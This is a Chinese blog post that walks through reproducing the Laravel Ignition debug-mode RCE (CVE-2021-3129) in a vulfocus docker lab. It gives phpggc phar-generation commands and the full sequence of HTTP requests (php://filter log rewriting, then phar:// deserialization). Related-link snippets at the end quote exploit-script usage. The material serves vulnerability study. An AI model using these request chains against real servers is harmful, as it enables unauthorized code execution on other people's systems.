【vulfocus漏洞复现】Laravel Debug mode RCE(CVE-2021-3129)复现

已于 2022-02-26 13:36:38 修改
阅读量2.7k 收藏 3
点赞数 1
分类专栏: vulhub&vulfocus漏洞复现 文章标签: laravel 信息安全 php
于 2022-02-26 13:34:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59924300/article/details/123148619
版权

软件简介

Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。

2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。

影响范围:      

Laravel<=v8.4.2调试模式

环境搭建:

本次实验用的是vulfocus上的靶场        

vulfocus/laravel-CVE-2021-3129

搭建方案一(这种方案比较稳定实验途中不会掉线)

docker pull vulfocus/laravel-CVE-2021-3129:latest
docker run -d -p 7001:7001 vulfocus/laravel-CVE-2021-3129

  搭建方案二(这种方法适合长期研究漏洞的小伙伴,但是环境时不时的掉线,这次实验掉了很多次):

 就是在本地搭建vulfocus然后更新漏洞环境,然后拉取下来

(搭建靶场的步骤请参考:https://zhuanlan.zhihu.com/p/398516109)

漏洞复现:

1.检测漏洞:

利用brup_suit发送数据包

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.111.130:29055
Content-Type: application/json
Content-Length: 168

{
  "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "xxxxxxx"
  }
}

如果出现了下面的那种情况说明存在漏洞:

2.漏洞利用

利用方式1:(Phar反序列化):

 从phpggc中去一条利用链:

php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "phpinfo();" --phar phar -o 1.gif

或者使用下面的这一条

php -d'phar.readonly=0' ./phpggc monolog/rce1 call_user_func phpinfo --phar phar -o 2.gif

假设后期利用框架进行开发的人员写出了一个文件上传的功能,那么我们就可以将这个phar文件上传上去,这里我们手动将其放入laravel的目录下,然后构造如下请求,利用上述的 file_get_contents() 去触发phar反序列化(抄别人的)

这次实验我们使用docker cp 命令将生成的gif图片放入网站的目录下面,

sudo docker cp /home/kali/桌面/phpggc-master/1.gif 3143b99e86b7:/var/www/html

接下来我们使用brup_suit进行发包处理(前提是要知道上传图片得绝对路径)

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.5.133: 19590
Content-Type: application/json
Content-Length: 194

{
  "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "phar:///var/www/phar.gif/test.txt"
  }
}

出现结果:

利用方式2(利用laravel.log实现phar反序列化):

该利用方法的核心步骤是将laravel.log里的内容清空,然后利用php://filter/write=写入phar反序列化的payload,最后发送请求利用 file_get_contents() 去触发phar反序列化。

利用bp发送下面的数据包将原为的原日志文件laravel.log清空:

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.5.130: 24336
Content-Type: application/json
Content-Length: 328

{
  "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
  }
}

然后用phpggc生成phar序列化利用POC

php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "phpinfo();" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"

将poc后面一个字母a

发送如下数据包,给Log增加一次前缀,用于对齐

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.5.130:24336
Content-Type: application/json
Content-Length: 169

{
  "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "AA"
  }
}

将生成的poc作为viewFile的值放包

发送如下数据包,清空对log文件中的干扰字符,只留下POC(这一步可能会出现异常,导致无法正确清理Log文件。如果出现这种状况,可以重新从第一步开始尝试。)

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.5.130:24336
Content-Type: application/json
Content-Length: 299

{
  "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
  }
}

使用phar://进行反序列化,执行任意代码

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.111.130:24336
Content-Type: application/json
Content-Length: 214

{
  "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "phar:///var/www/storage/logs/laravel.log/test.txt"
  }
}

漏洞修复

更新到最新版本

参考:

https://whoamianony.top/2021/01/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Laravel/Laravel%20Debug%20mode%20RCE%EF%BC%88CVE-2021-3129%EF%BC%89%E5%88%A9%E7%94%A8%E5%A4%8D%E7%8E%B0/
FlynnAAAA
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Laravel Debug mode RCECVE-2021-3129漏洞复现
m0_48520508的博客
02-19 1421
0x00简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 0x01漏洞概述 当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远
Laravel Debug mode 远程代码执行(CVE-2021-3129
jammny
01-30 3252
漏洞详情 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 漏洞影响 Laravel <= 8.4.2 Ignition <= 2.5.1 漏洞利用 下载靶场:gi
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
Laravel RCECVE-2021-3129漏洞复现
szgyunyun的博客
07-13 3142
Laravel框架简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 在Laravel中已经具有了一套高级的PHP ActiveRecord实现 – Eloquent ORM。它能方便的将“约束(constraints)”应用到关系的双方,这样你就具有了对数据的完全控制,而且享受到ActiveRecord的所有便利。Eloquent原生支持Flu
vulfocus靶场之redis命令执行cve-2022-0543漏洞复现
最新发布
没有故事
04-18 645
我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。输入网址和端口,点击OK。
Laravel 远程代码执行漏洞(CVE-2021-3129)复现
oiadkt的博客
04-24 4955
Laravel 远程代码执行漏洞(CVE-2021-3129)
Laravel命令执行漏洞
longwanlian的博客
12-12 1039
Laravel基于php搭建的开发框架。
laravel-exploits:针对CVE-2021-3129漏洞利用
05-25
laravel漏洞 漏洞利用CVE-2021-3129详细信息: ://www.ambionics.io/blog/laravel-debug-rce 用法 $ php -d ' phar.readonly=0 ' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log Logs cleared Successfully converted to PHAR ! Phar deserialized -----------
CVE-2021-3129Laravel远程代码漏洞复现分析
华为云官方博客
03-17 6641
本文主要为大家带来CVE-2021-3129漏洞复现分析,为大家在日常工作中提供帮助。
再谈Laravel Debug mode RCECVE-2021-3129漏洞
wangluoanquan111的博客
08-10 2495
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
CVE-2021-3129:Laravel调试RCE
05-26
CVE-2021-3129 Laravel debug rce 食用方法 执行docker-compse up -d启动环境 访问8888端口后点击首页面的generate key就可以复现了 关于docker环境想说的几点: 把.env.example复制到.env作用是开启debug环境 关闭了php.ini的phar.readonly 在resources/view/里添加了一个hello模板并引用了一个未定义变量,同时在routes/web.php添加路由(这个我加在源码里了,没写dockerfile里) 复现效果 脚本已放出,脚本要和phpggc项目文件夹在同一级目录下。 通用性不强(至少打我自己的环境可以),大家可自行把phpggc的其它rce链也加进去,提高通杀能力。 参考资源
CVE-2021-3129:Laravel <= v8.4.2调试模式
05-10
CVE-2021-3129 Laravel <= v8.4.2调试模式:远程执行代码(CVE-2021-3129) 修改了@crisprss师傅的增加了更多可用的小工具用作遍历 用: python3 exp.py http://127.0.0.1:8888 效果: zhzy@debian:/opt/tools/vuln/laravel/CVE-2021-3129/phpggc$ python3 exp.py http://127.0.0.1:8888 [*] Try to use Laravel/RCE1 for exploitation. [+]exploit: [*] Laravel/RCE1 Result: [*] Try to use Laravel/RCE2 for exploitation. [+]exploit: [*] Laravel/RCE2 Result: [*
CV-2021-3129-POC
03-26
CV-2021-3129-POC
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
漏洞复现CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞
热门推荐
做自己喜欢的事,并将其发挥到极致!
03-03 1万+
文章目录前言一、漏洞简介二、影响范围三、环境搭建四、漏洞复现五、修复方法六、参考链接 前言 仅供安全研究和技术学习,切勿用于非法用途,切记! 一、漏洞简介 当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 二、影响范围 Laravel < 8.4.3 facade
漏洞复现| Laravel Debug mode RCECVE-2021-3129
qq_42570883的博客
02-05 4398
漏洞名称】 Laravel Debug mode RCECVE-2021-3129) 【漏洞详情】 近日,国外某安全研究团队披露了 Laravel <= 8.4.2 存在远程代码执行漏洞。当Laravel开启了Debug模式时,由于Laravel自带的Ignition功能的某些接口存在过滤不严,攻击者可以发起恶意请求,通过构造恶意Log文件等方式触发Phar反序列化,从而造成远程代码执行,控制服务器。漏洞细节已在互联网公开。 【漏洞编号】 CVE-2021-3129 【验证工具】 https://
深入理解Laravel(CVE-2021-3129)RCE漏洞(超2万字从源码分析黑客攻击流程)
weixin_42100387的博客
11-21 823
深入理解Laravel(CVE-2021-3129)RCE漏洞(超2万字从源码分析黑客攻击流程)
cve-2021-2888
07-28
回答: CVE-2021-2888是一项与Oracle WebLogic Server相关的漏洞。根据引用\[1\]中提到的词云分析,Weblogic框架是一个频繁出现RCE漏洞的框架之一。然而,关于CVE-2021-2888的具体细节和影响,我无法提供更多信息,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值